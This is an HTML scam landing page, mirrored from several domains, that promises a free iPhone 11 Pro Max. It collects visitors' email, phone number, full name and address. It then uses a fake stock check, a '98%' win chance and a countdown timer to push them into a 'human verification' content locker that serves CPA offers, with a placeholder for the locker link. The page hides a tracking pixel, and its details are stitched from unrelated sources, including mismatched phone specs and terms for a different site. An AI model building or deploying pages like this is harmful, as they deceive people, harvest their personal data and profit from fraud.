<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">



<!-- Mirrored from iphonexgifted.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 18 Feb 2018 07:38:47 GMT -->

<!-- Mirrored from getgift.pro/iphonex/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 15 Feb 2019 07:55:31 GMT -->

<!-- Mirrored from tfiles.us/iphonex/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 13 Sep 2019 13:18:54 GMT -->
<head>

<title>Win a brand new iPhone 11 Max Pro</title>


    <meta name="viewport" content="width=device-width, initial-scale=1.0" />

	<meta name="description" content="Enter our time-limited give-away and win iPhone 7 Plus 256GB in any color you want!" />    

    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />

	<link rel="icon" type="image/ico" href="img/favicon.ico" />

	<link rel="apple-touch-icon" sizes="57x57" href="img/apple-icon-57x57.html">

	<link rel="apple-touch-icon" sizes="60x60" href="img/apple-icon-60x60.html">

	<link rel="apple-touch-icon" sizes="72x72" href="img/apple-icon-72x72.html">

	<link rel="apple-touch-icon" sizes="76x76" href="img/apple-icon-76x76.html">

	<link rel="apple-touch-icon" sizes="114x114" href="img/apple-icon-114x114.html">

	<link rel="apple-touch-icon" sizes="120x120" href="img/apple-icon-120x120.html">

	<link rel="apple-touch-icon" sizes="144x144" href="img/apple-icon-144x144.html">

	<link rel="apple-touch-icon" sizes="152x152" href="img/apple-icon-152x152.html">

	<link rel="apple-touch-icon" sizes="180x180" href="img/apple-icon-180x180.html">

	<link rel="icon" type="image/png" sizes="192x192"  href="img/android-icon-192x192.html">

	<link rel="icon" type="image/png" sizes="32x32" href="img/favicon-32x32.html">

	<link rel="icon" type="image/png" sizes="96x96" href="img/favicon-96x96.html">

	<link rel="icon" type="image/png" sizes="16x16" href="img/favicon-16x16.png">

	<link rel="manifest" href="img/manifest.html">

	<meta name="msapplication-TileColor" content="#ffffff">

	<meta name="msapplication-TileImage" content="img/ms-icon-144x144.html">

	<meta name="theme-color" content="#ffffff">

    	<meta property="og:image" content="i.imgur.com/JXKVaS1.html"/>

    <!-- CSS -->

	<link href='https://fonts.googleapis.com/css?family=Raleway:300,400,700' rel='stylesheet' type='text/css'>

    <link href="css/fancySelect.css" rel="stylesheet" />

	<link rel="stylesheet" href="maxcdn.bootstrapcdn.com/font-awesome/4.5.0/css/font-awesome.min.css">

    <link href="css/bootstrap.min.css" rel="stylesheet" />

    <link href="css/sweet-alert.css" rel="stylesheet" />

    <link href="css/animate.css" rel="stylesheet" />

    <link href="css/magnific-popup.css" rel="stylesheet" />

    <link href="css/style.css" rel="stylesheet" />

	

    <!-- HTML5 Shim and Respond.js IE8 support of HTML5 elements and media queries -->

    <!-- WARNING: Respond.js doesn't work if you view the page via file:// -->

    <!--[if lt IE 9]>

      <script src="https://oss.maxcdn.com/libs/html5shiv/3.7.0/html5shiv.js"></script>

      <script src="https://oss.maxcdn.com/libs/respond.js/1.3.0/respond.min.js"></script>

    <![endif]-->

</head>

<body>

	<div id="human-verification" class="generator-verification mfp-hide white-popup-block">

        <div class="row">

            <div class="col-md-12">

                <div class="section_heading text-center">

                    <h1>Human Verification</h1>

                </div>

            </div>

        </div>

        <div class="row">

            <div id="floatBarsG">

                <div id="floatBarsG_1" class="floatBarsG"></div>

                <div id="floatBarsG_2" class="floatBarsG"></div>

                <div id="floatBarsG_3" class="floatBarsG"></div>

                <div id="floatBarsG_4" class="floatBarsG"></div>

                <div id="floatBarsG_5" class="floatBarsG"></div>

                <div id="floatBarsG_6" class="floatBarsG"></div>

                <div id="floatBarsG_7" class="floatBarsG"></div>

                <div id="floatBarsG_8" class="floatBarsG"></div>

            </div>

        </div>

        <div class="row">

            <div class="col-md-12">

                <div class="popup-wrapper">

                    <ol>

                        <li>Like and Share us on Facebook.</li>

<center> 
<iframe src="#" width="92" height="21" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true"></iframe>
<iframe src="#" width="58" height="20" style="border:none;overflow:hidden" scrolling="no" frameborder="0" allowTransparency="true"></iframe> 
</center>

                        <li>Choose and Complete one of the offers that appear below on your screen.</li>

                        <li>Once the offer has been completed, you will automatically proceed.</li>

                    </ol>

                </div>

            </div>

        </div>

        <div class="row">

            <div class="col-md-12 text-center offwrap">

                <center>

                    <span class="offtitle">Complete one of the offers below to finish human verification</span>

					 <!-- <a class="complete-human-verification-button" href="#" onclick="og_load();"><i class="icon-profile-male" aria-hidden="true"></i>Verify Now</a> --> 
					<!-- CPA CODE --> 
					<iframe scrolling="yes" style="margin-bottom: -10px; overflow: hidden;" src="https://www.rabbitfiles.com/cl.php?id=13754ca4b28826c42a04ebcc12c83697" opacity="0" margin-top="10px" marginwidth="0" marginheight="0" align="middle" frameborder="0" width="100%" height="340px"></iframe> 



                </center>

            </div>

        </div>

    </div>

	<header>

		<div class="container">

			<div class="row">

				<div class="col-md-6">

					<img class="img-responsive logo-img" src="img/header-logo.png">

					<h1>Win a brand new<span>iPhone 11 Pro Max</span></h1>

					<p>Enter our time-limited give-away and win iPhone 11 Pro Max 256GB in any color you want! </p>

	<a class="header-entry-button scroll-me" href="#enter-give-away-now"><img class="header-button-img" src="img/header-button-img.png">iPhone 11 Pro Max  for you &nbsp; &nbsp;<span class="button-subtext">Get it Now</span></a>				
</div>

				<div class="col-md-6">

					<img class="img-responsive parallaxme header-img-right" src="https://img.phonandroid.com/2019/09/iphone-11-11-pro-precommandes.jpg">

				</div>

			</div>	

		</div>	

	</header>

	<section class="section-first">

		<div class="container">

			<div class="row">

				<div class="col-md-4">

					<div class="description-col description-col-1 make-me-same-height-1">

						<i class="icon-phone"></i>

						<h3>Three cameras that shoot as one</h3>						

						<p>16MP wide-angle and telephoto cameras Wide-angle: ƒ/1.8 aperture Telephoto: ƒ/2.4 aperture Dual optical image stabilization Optical zoom; digital zoom up to 10x Wide color capture for photos and Live Photos Quad-LED True Tone flash with Slow Sync.</p>

					</div>

					<div class="description-col description-col-2 make-me-same-height-2">

						<i class="icon-speedometer"></i>

						<h3>Power and Battery</h3>						

						<p>Lasts up to 2 hours longer Built-in rechargeable lithium‑ion battery Wireless charging (works with Qi chargers3) .</p>

					</div>

				</div>

				<div class="col-md-4 section-first-mid-img-wrapp">

					<img class="img-responsive mid-img-first" src="https://cdn.wccftech.com/wp-content/uploads/2019/09/Screen-Shot-2019-09-05-at-9.01.57-PM-2060x1337.png">

					<img class="img-responsive mid-img-overlay" src="https://cdn.wccftech.com/wp-content/uploads/2019/09/Screen-Shot-2019-09-05-at-9.01.57-PM-2060x1337.png">

				</div>

				<div class="col-md-4">

					<div class="description-col description-col-3 make-me-same-height-1">

						<i class="icon-camera"></i>

						<h3>Super Retina HD display</h3>						

						<p>5.8-inch (diagonal) all-screen OLED Multi‑Touch display2.  HDR display 2436-by-1125-pixel resolution at 458 ppi. 1,000,000:1 contrast ratio typical True Tone display Wide color display P3 3D Touch 625 cd/m2 max brightness (typical)</p>

						

					</div>

					<div class="description-col description-col-4 make-me-same-height-2">

						<i class="icon-scope"></i>

						<h3>The most powerful chip ever in a smartphone.</h3>						

						<p>iPhone 11 Pro Max is supercharged by the most powerful chip ever in a smartphone. It&#39;s not just faster than any previous iPhone &#151 it&#39;s also more efficient. </p>						

					</div>

				</div>

			</div>

		</div>	

	</section>

	<section class="section-second">

		<div class="container">

			<div id="enter-give-away-now" class="row phone-select-row">				

				<div class="step1 marker_show">

					<h1><span>iPhone 11 Pro Max Give-Away</span>Choose your Color</h1>

					<div class="col-md-3 col-sm-6 next">

						<a href="javascript:void(0)" class="color-select-button color-select-button_1">

							<img class="img-responsive img-color-select" src="https://cdn.cultofmac.com/wp-content/uploads/2019/09/57318DA0-F670-49B7-874E-16ACD8C61F11.jpeg">

							<span>Green</span>

						</a>

					</div>

					<div class="col-md-3 col-sm-6 next">

						<a href="javascript:void(0)" class="color-select-button color-select-button_2">

							<img class="img-responsive img-color-select" src="https://cdn.cultofmac.com/wp-content/uploads/2019/09/37706777-2214-4CB9-82B1-F0CA0EDAA83E-780x780.jpeg">

							<span>Pink</span>

						</a>

					</div>

				</div>

				<!-- STEP 1 END -->

							

				<div class="step2 marker_show" style="display: none;">

					<h1><span>iPhone 11 Pro Max Give-Away</span>Choose your Capacity</h1>

					<div class="col-sm-4 next">

						<a href="javascript:void(0)" class="capacity-select-button color-select-capacity_1">

							<span class="gb-amount">64<span class="gb-sign">GB</span></span>

							<div class="capacity-info">

								<span class="reg-price"><span class="price-label">Left in stock:</span> 05</span>

								<span class="reg-price"><span class="price-label">Regular price:</span> $999,00</span>

								<span class="your-price"><span class="price-label">Your price:</span> $0,00</span>

							</div>	

						</a>

					</div>

				
					<div class="col-sm-4 next">

						<a href="javascript:void(0)" class="capacity-select-button color-select-capacity_1">

							<span class="gb-amount">256<span class="gb-sign">GB</span></span>

							<div class="capacity-info">

								<span class="reg-price"><span class="price-label">Left in stock:</span> 03</span>

								<span class="reg-price"><span class="price-label">Regular price:</span> $1,149.00$</span>

								<span class="your-price"><span class="price-label">Your price:</span> $0,00</span>

							</div>	

						</a>

					</div>

				</div>

				<!-- STEP 2 END -->

							

				<div class="step3 marker_show" style="display: none;">

					<h1><span>iPhone 11 Pro Max Give-Away</span>Your contact info</h1>

					<div class="user-email-input-wrapper"><input style="margin: 20px 0;" class="user-email-input" id="user-email-submit" type="email" name="email" placeholder="Contact e-mail address"></div>


					<div class="user-email-input-wrapper"><input style="margin: 20px 0;" class="user-email-input" type="number" name="email" placeholder="Enter your Phone Number"></div>


					<div class="user-email-input-wrapper"><input style="margin: 20px 0;" class="user-email-input" type="name" name="email" placeholder="Enter Your Full Name"></div>


					<div class="user-email-input-wrapper"><input style="margin: 20px 0;" class="user-email-input" type="name" name="email" placeholder="Enter Your Full Adress"></div>



					<span class="email-info-notice">We hate spam!<br>E-mail will only be used for contacting give-away winners.</span>



					<a class="contest-entry-button run_loading" href="#"><i class="fa fa-share" aria-hidden="true"></i>Submit</a>					

				</div>

				<!-- STEP 3 END -->

							

				<div class="step4 marker_show" style="display: none;">

				<center>

					<div id="floatBarsG">

						<div id="floatBarsG_1" class="floatBarsG"></div>

						<div id="floatBarsG_2" class="floatBarsG"></div>

						<div id="floatBarsG_3" class="floatBarsG"></div>

						<div id="floatBarsG_4" class="floatBarsG"></div>

						<div id="floatBarsG_5" class="floatBarsG"></div>

						<div id="floatBarsG_6" class="floatBarsG"></div>

						<div id="floatBarsG_7" class="floatBarsG"></div>

						<div id="floatBarsG_8" class="floatBarsG"></div>

					</div>

				</center>

				<div class="congrats-wrapper">

					<h3 class="run_loading_1 main_review">Checking selected Color Stock Value...</h3>

					<h3 class="run_loading_2" style="display: none;">Checking selected Capacity Stock Value...</h3>    

					<h3 class="run_loading_3" style="display: none;">Checking double previous attempts...</h3>

					<h3 class="run_loading_4" style="display: none;">Processing your request...</h3>

					<div class="run_loading_5" style="display: none;">

					<div class="cg-outer-wrap">

						<div class="cg-wrap">

							<h3>Congratulations, you qualify to enter our iPhone 11 Pro Max giveaway!</h3>
							<h3>Your chance to win is <b style="color: #ff4848;">98%</b>!</h3>


							

						</div>

					</div>

					<p class="note1">Due to large amount of duplicate entries and abuse of our giveaways with programmed robot software, you are required to complete <strong>Human Verification</strong> by clicking a button below.</p>

					<p class="note3"><strong>Note:</strong> Your application will not be submited untill you complete human verification!</p>

					</div>		



					<ul class="done_marker">

						<li class="thank_for_close" style="display: none;">Selected color is in stock.</li>						

						<li class="li_run_loading_1" style="display: none;">Selected capacity is in stock.</li>

						<li class="li_run_loading_2" style="display: none;">No previous attempts found.</li>

						<li class="li_run_loading_4" style="display: none;">You qualify to participate in our give-away!</li>

					</ul>

					

					<div class="show_end" style="display: none;">

						<div class="countdown-wrap">You have <span id="javascript_countdown_time"></span> to complete human verification or your spot will be given to someone else. Click on Verify Now.</div>






















						<!-- Ogads_Link -->


						<a style="    font-size: 35px;
    font-weight: bold;
    border: 5px solid black;
    padding: 10px;
    cursor: pointer;
    background: tomato;
    color: black;" href="YOUR_LINK_LOCKER_HERE">Verify Now</a>


   						 <!-- Ogads_Link -->












   						 

					</div>

				</div>	

				</div>

				<!-- STEP 4 END -->

				
			</div>

			

		</div>	

		<div class="recent-activity follow-scroll">

					<h2> Win a brand new iPhone 11 Pro Max </h2>

					<div class="recent-activity-wrapper">

						<div class="panel-body" id=""></div>

					</div>

		</div>

	</section>

	<footer>

		<div class="container">

			<div class="policy-links">

				<a class="popup-contact popup-link" href="#contact-us">Contact Us</a><span class="pp-sep"> |</span>

				<a class="popup-tos popup-link" href="#terms-of-service">Terms of Service</a><span class="pp-sep"> |</span>

				<a class="popup-pp popup-link" href="#privacy-policy">Privacy Policy</a>

			</div>

			<p>All trademarks, service marks, trade names, trade dress, product names and logos appearing on the site are the property of their respective owners.</p>

		</div>	

	</footer>

	<div id="terms-of-service" class="tos-popup-wrapper popup-wrapper mfp-hide">

		<h1>Terms of service</h1>

		

		<p>These terms of service ("Terms", "Agreement") are an agreement between the operator of GoT Trivia ("Website operator", "us", "we" or "our") and you ("User", "you" or "your"). This Agreement sets forth the general terms and conditions of your use of the http://www.got-trivia.online website and any of its products or services (collectively, "Website" or "Services").</p>

		

		<h2>Age requirement</h2>

		

		<p>You must be at least 18 years of age to use this Website. By using this Website and by agreeing to this Agreement you warrant and represent that you are at least 18 years of age.</p>

		

		<h2>Backups</h2>

		

		<p>We are not responsible for Content residing on the Website. In no event shall we be held liable for any loss of any Content. It is your sole responsibility to maintain appropriate backup of your Content. Notwithstanding the foregoing, on some occasions and in certain circumstances, with absolutely no obligation, we may be able to restore some or all of your data that has been deleted as of a certain date and time when we may have backed up data for our own purposes. We make no guarantee that the data you need will be available.</p>

		

		<h2>Links to other websites</h2>

		

		<p>Although this Website may be linked to other websites, we are not, directly or indirectly, implying any approval, association, sponsorship, endorsement, or affiliation with any linked website, unless specifically stated herein. We are not responsible for examining or evaluating, and we do not warrant the offerings of, any businesses or individuals or the content of their websites. We do not assume any responsibility or liability for the actions, products, services and content of any other third parties. You should carefully review the legal statements and other conditions of use of any website which you access through a link from this Website. Your linking to any other off-site pages or other websites is at your own risk.</p>

		

		<h2>Advertisements</h2>

		

		<p>During use of the Website, you may enter into correspondence with or participate in promotions of advertisers or sponsors showing their goods or services through the Website. Any such activity, and any terms, conditions, warranties or representations associated with such activity, is solely between you and the applicable third-party. We shall have no liability, obligation or responsibility for any such correspondence, purchase or promotion between you and any such third-party.</p>

		

		<h2>Prohibited uses</h2>

		

		<p>In addition to other terms as set forth in the Agreement, you are prohibited from using the website or its content: (a) for any unlawful purpose; (b) to solicit others to perform or participate in any unlawful acts; (c) to violate any international, federal, provincial or state regulations, rules, laws, or local ordinances; (d) to infringe upon or violate our intellectual property rights or the intellectual property rights of others; (e) to harass, abuse, insult, harm, defame, slander, disparage, intimidate, or discriminate based on gender, sexual orientation, religion, ethnicity, race, age, national origin, or disability; (f) to submit false or misleading information; (g) to upload or transmit viruses or any other type of malicious code that will or may be used in any way that will affect the functionality or operation of the Service or of any related website, other websites, or the Internet; (h) to collect or track the personal information of others; (i) to spam, phish, pharm, pretext, spider, crawl, or scrape; (j) for any obscene or immoral purpose; or (k) to interfere with or circumvent the security features of the Service or any related website, other websites, or the Internet. We reserve the right to terminate your use of the Service or any related website for violating any of the prohibited uses.</p>

		

		<h2>Limitation of liability</h2>

		

		<p>To the fullest extent permitted by applicable law, in no event will Website operator, its affiliates, officers, directors, employees, agents, suppliers or licensors be liable to any person for (a): any indirect, incidental, special, punitive, cover or consequential damages (including, without limitation, damages for lost profits, revenue, sales, goodwill, use or content, impact on business, business interruption, loss of anticipated savings, loss of business opportunity) however caused, under any theory of liability, including, without limitation, contract, tort, warranty, breach of statutory duty, negligence or otherwise, even if Website operator has been advised as to the possibility of such damages or could have foreseen such damages. To the maximum extent permitted by applicable law, the aggregate liability of Website operator and its affiliates, officers, employees, agents, suppliers and licensors, relating to the services will be limited to an amount greater of one dollar or any amounts actually paid in cash by you to Website operator for the prior one month period prior to the first event or occurrence giving rise to such liability. The limitations and exclusions also apply if this remedy does not fully compensate you for any losses or fails of its essential purpose.</p>

		

		<h2>Indemnification</h2>

		

		<p>You agree to indemnify and hold Website operator and its affiliates, directors, officers, employees, and agents harmless from and against any liabilities, losses, damages or costs, including reasonable attorneys' fees, incurred in connection with or arising from any third-party allegations, claims, actions, disputes, or demands asserted against any of them as a result of or relating to your Content, your use of the Website or Services or any willful misconduct on your part.</p>

		

		<h2>Severability</h2>

		

		<p>All rights and restrictions contained in this Agreement may be exercised and shall be applicable and binding only to the extent that they do not violate any applicable laws and are intended to be limited to the extent necessary so that they will not render this Agreement illegal, invalid or unenforceable. If any provision or portion of any provision of this Agreement shall be held to be illegal, invalid or unenforceable by a court of competent jurisdiction, it is the intention of the parties that the remaining provisions or portions thereof shall constitute their agreement with respect to the subject matter hereof, and all such remaining provisions or portions thereof shall remain in full force and effect.</p>

		

		<h2>Dispute resolution</h2>

		

		<p>The formation, interpretation and performance of this Agreement and any disputes arising out of it shall be governed by the substantive and procedural laws of Bern, Switzerland without regard to its rules on conflicts or choice of law and, to the extent applicable, the laws of Switzerland. The exclusive jurisdiction and venue for actions related to the subject matter hereof shall be the state and federal courts located in Bern, Switzerland, and you hereby submit to the personal jurisdiction of such courts. You hereby waive any right to a jury trial in any proceeding arising out of or related to this Agreement. The United Nations Convention on Contracts for the International Sale of Goods does not apply to this Agreement.</p>

		

		<h2>Changes and amendments</h2>

		

		<p>We reserve the right to modify this Agreement or its policies relating to the Website or Services at any time, effective upon posting of an updated version of this Agreement on the Website. When we do we will  revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>

		

		<h2>Acceptance of these terms</h2>

		

		<p>You acknowledge that you have read this Agreement and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Agreement. If you do not agree to abide by the terms of this Agreement, you are not authorized to use or access the Website and its Services.</p>

		

		<h2>Contacting us</h2>

		

		<p>If you have any questions about this Policy, please contact us.</p>

		

		<p>This document was last updated on March 10, 2019</p>

	</div>

	<div id="privacy-policy" class="pp-popup-wrapper popup-wrapper mfp-hide">

		<h1>Privacy policy</h1>



		<p>This privacy policy ("Policy") describes how we collect, protect and use the personally identifiable information ("Personal Information") you ("User", "you" or "your") provide on the http://www.got-trivia.online website and any of its products or services (collectively, "Website" or "Services"). It also describes the choices available to you regarding our use of your personal information and how you can access and update this information. This Policy does not apply to the practices of companies that we do not own or control, or to individuals that we do not employ or manage.</p>

		

		<h2>Collection of personal information</h2>

		

		<p>We receive and store any information you knowingly provide to us when you fill any online forms on the Website.  You can choose not to provide us with certain information, but then you may not be able to take advantage of some of the Website's features.</p>

		

		<h2>Collection of non-personal information</h2>

		

		<p>When you visit the Website our servers automatically record information that your browser sends. This data may include information such as your computer's IP address, browser type and version, operating system type and version, language preferences or the webpage you were visiting before you came to our Website, pages of our Website that you visit, the time spent on those pages, information you search for on our Website, access times and dates, and other statistics.</p>

		

		<h2>Use of collected information</h2>

		

		<p>Any of the information we collect from you may be used to  personalize your experience; improve our website; improve customer service and respond to queries and emails of our customers; run and operate our Website and Services. Non-personal information collected is used only to identify potential cases of abuse and establish statistical information regarding Website traffic and usage. This statistical information is not otherwise aggregated in such a way that would identify any particular user of the system.</p>

		

		<h2>Children</h2>

		

		<p>We do not knowingly collect any personal information from children under the age of 13. If you are under the age of 13, please do not submit any personal information through our Website or Service. We encourage parents and legal guardians to monitor their children's Internet usage and to help enforce this Policy by instructing their children never to provide personal information through our Website or Service without their permission. If you have reason to believe that a child under the age of 13 has provided personal information to us through our Website or Service, please contact us.</p>

		

		<h2>Cookies</h2>

		

		<p>The Website uses "cookies" to help personalize your online experience. A cookie is a text file that is placed on your hard disk by a web page server. Cookies cannot be used to run programs or deliver viruses to your computer. Cookies are uniquely assigned to you, and can only be read by a web server in the domain that issued the cookie to you. We may use cookies to collect, store, and track information for statistical purposes to operate our Website and Services. You have the ability to accept or decline cookies. Most web browsers automatically accept cookies, but you can usually modify your browser setting to decline cookies if you prefer. If you choose to decline cookies, you may not be able to fully experience the features of the Website and Services.</p>

		

		<h2>Advertisement</h2>

		

		<p>We may display online advertisements and we may share aggregated and non-identifying information about our customers that we collect through the registration process or through online surveys and promotions with certain advertisers. We do not share personally identifiable information about individual customers with advertisers. In some instances, we may use this aggregated and non-identifying information to deliver tailored advertisements to the intended audience.</p>

		

		<h2>Links to other websites</h2>

		

		<p>Our Website contains links to other websites that are not owned or controlled by us. Please be aware that we are not responsible for the privacy practices of such other websites or third parties. We encourage you to be aware when you leave our Website and to read the privacy statements of each and every website that may collect personal information.</p>

		

		<h2>Information security</h2>

		

		<p>We secure information you provide on computer servers in a controlled, secure environment, protected from unauthorized access, use, or disclosure. We maintain reasonable administrative, technical, and physical safeguards in an effort to protect against unauthorized access, use, modification, and disclosure of personal information in its control and custody. However, no data transmission over the Internet or wireless network can be guaranteed. Therefore, while we strive to protect your personal information, you acknowledge that (i) there are security and privacy limitations of the Internet which are beyond our control; (ii) the security, integrity, and privacy of any and all information and data exchanged between you and our Website cannot be guaranteed; and (iii) any such information and data may be viewed or tampered with in transit by a third party, despite best efforts.</p>

		

		<h2>Data breach</h2>

		

		<p>In the event we become aware that the security of the Website has been compromised or users Personal Information has been disclosed to unrelated third parties as a result of external activity, including, but not limited to, security attacks or fraud, we reserve the right to take reasonably appropriate measures, including, but not limited to, investigation and reporting, as well as notification to and cooperation with law enforcement authorities. In the event of a data breach, we will make reasonable efforts to notify affected individuals if we believe that there is a reasonable risk of harm to the user as a result of the breach or if notice is otherwise required by law. When we do we will post a notice on the Website.</p>

		

		<h2>Changes and amendments</h2>

		

		<p>We reserve the right to modify this privacy policy relating to the Website or Services at any time, effective upon posting of an updated version of this privacy policy on the Website. When we do we will  revise the updated date at the bottom of this page. Continued use of the Website after any such changes shall constitute your consent to such changes.</p>

		

		<h2>Acceptance of this policy</h2>

		

		<p>You acknowledge that you have read this Policy and agree to all its terms and conditions. By using the Website or its Services you agree to be bound by this Policy. If you do not agree to abide by the terms of this Policy, you are not authorized to use or access the Website and its Services.</p>

		

		<h2>Contacting us</h2>

		

		<p>If you have any questions about this Policy, please contact us.</p>

		

		<p>This document was last updated on March 10, 2019</p>

	</div>

	<div id="contact-us" class="contact-popup-wrapper popup-wrapper mfp-hide">

		<h1>Send us a message</h1>

		<div class="contact-form-wrapper">

			<form role="form" id="contactForm" data-toggle="validator" class="shake">

				<div class="row">

					<div class="form-group col-sm-6">

						<label for="name" class="h4">Name</label>

						<input type="text" class="form-control" id="name" placeholder="Enter name" required data-error="NEW ERROR MESSAGE">

						<div class="help-block with-errors"></div>

					</div>

					<div class="form-group col-sm-6">

						<label for="email" class="h4">Email</label>

						<input type="email" class="form-control" id="email" placeholder="Enter email" required>

						<div class="help-block with-errors"></div>

					</div>

				</div>

				<div class="form-group">

					<label for="message" class="h4 ">Message</label>

					<textarea id="message" class="form-control" rows="5" placeholder="Enter your message" required></textarea>

					<div class="help-block with-errors"></div>

				</div>

				<button type="submit" id="form-submit" class="btn btn-success btn-lg pull-right ">Submit</button>

				<div id="msgSubmit" class="h3 text-center hidden"></div>

				<div class="clearfix"></div>

			</form>

		</div>

	</div>

    <script type="text/javascript" src="ajax.googleapis.com/ajax/libs/jquery/2.1.4/jquery.min.js"></script>

	<script type="text/javascript">

	/* TIMER */

	var javascript_countdown = function () {

	    var time_left =  600; //number of seconds for countdown

	    var keep_counting = 1;

	    var no_time_left_message = 'few minutes';

	    function countdown() {

	        if(time_left < 2) {

	            keep_counting = 0;

	        }

	        time_left = time_left - 1;

	    }

	    function add_leading_zero( n ) {

	        if(n.toString().length < 2) {

	            return '0' + n;

	        } else {

	            return n;

	        }

	    }

	    function format_output() {

	        var hours, minutes, seconds;

	        seconds = time_left % 60;

	        minutes = Math.floor(time_left / 60) % 60;

	        hours = Math.floor(time_left / 3600);   

	        seconds = add_leading_zero( seconds );

	        minutes = add_leading_zero( minutes );

	        hours = add_leading_zero( hours );

	        return minutes + ' minutes and ' + seconds + ' seconds';

	    }

	    function show_time_left() {

	        document.getElementById('javascript_countdown_time').innerHTML = '<span>' + format_output() + '</span>';//time_left;

	    }

	    function no_time_left() {

	        document.getElementById('javascript_countdown_time').innerHTML = no_time_left_message;

	    }

	    return {

	        count: function () {

	            countdown();

	            show_time_left();

	        },

	        timer: function () {

	            javascript_countdown.count();

	            if(keep_counting) {

	                setTimeout("javascript_countdown.timer();", 1000);

	            } else {

	                no_time_left();

	            }

	        },

	        init: function (n) {

	            time_left = n;

	            javascript_countdown.timer();

	        }

	    };

	}();

	javascript_countdown.init(900);

	/* TIMER END */

	</script>

    <script type="text/javascript" src="js/validator.min.js"></script>
	

	<script type="text/javascript" src="js/sweet-alert.min.js"></script>

	<script type="text/javascript" src="js/jquery.magnific-popup.min.js"></script>	

	<script type="text/javascript" src="js/jquery.parallax-1.1.3.js"></script>

    <script type="text/javascript" src="js/main.js"></script>	
<img src="widgets.amung.us/classic/00/14.html" width="0" height="0" border="0">
</body>


<!-- Mirrored from iphonexgifted.com/ by HTTrack Website Copier/3.x [XR&CO'2014], Sun, 18 Feb 2018 07:39:23 GMT -->

<!-- Mirrored from getgift.pro/iphonex/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 15 Feb 2019 07:56:23 GMT -->

<!-- Mirrored from tfiles.us/iphonex/ by HTTrack Website Copier/3.x [XR&CO'2014], Fri, 13 Sep 2019 13:19:42 GMT -->
</html>

